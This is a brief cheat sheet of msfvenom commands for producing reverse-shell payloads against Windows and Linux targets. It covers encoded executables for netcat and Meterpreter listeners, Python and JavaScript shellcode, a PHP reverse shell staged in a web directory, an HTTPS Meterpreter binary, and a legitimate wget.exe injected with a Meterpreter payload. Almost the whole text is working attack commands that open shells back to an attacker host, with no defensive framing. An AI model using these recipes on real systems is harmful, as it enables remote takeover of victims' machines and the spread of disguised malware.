Kali - msfvenom

Attacker = 10.1.1.10
Target = 10.1.1.200

Create a Windows reverse shell executable for netcat listener:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /var/www/windows_rev_443.exe

Create a Windows reverse shell executable for Meterpreter listener:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /var/www/windows_rev_443.exe

Create a Linux reverse shell executable for netcat listener:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.1 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f elf -o /var/www/linux_rev_443

Create a Linux reverse shell executable for Meterpreter listener:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f elf -o /var/www/linux_rev_443

Create a reverse TCP shell to include in a Python exploit for a Windows target:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.1.1.10 LPORT=4444 -f python

Create a php reverse shell for a Linux environment:

msfvenom -p php/reverse_php -f raw lhost=10.1.1.10 lport=4444 > /var/www/revphp.txt && sed -i '1s/^/<?php \n/' /var/www/revphp.txt

Create javascript reverse shell for a Windows target (Little Endian):

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f js_le -o ./shellcode.txt

Create an https encrypted reverse shell executable:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o rev_https.exe

Inject a payload into wget.exe and save as .exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -x /usr/share/windows-binaries/wget.exe -k -f exe -o wget_bad.exe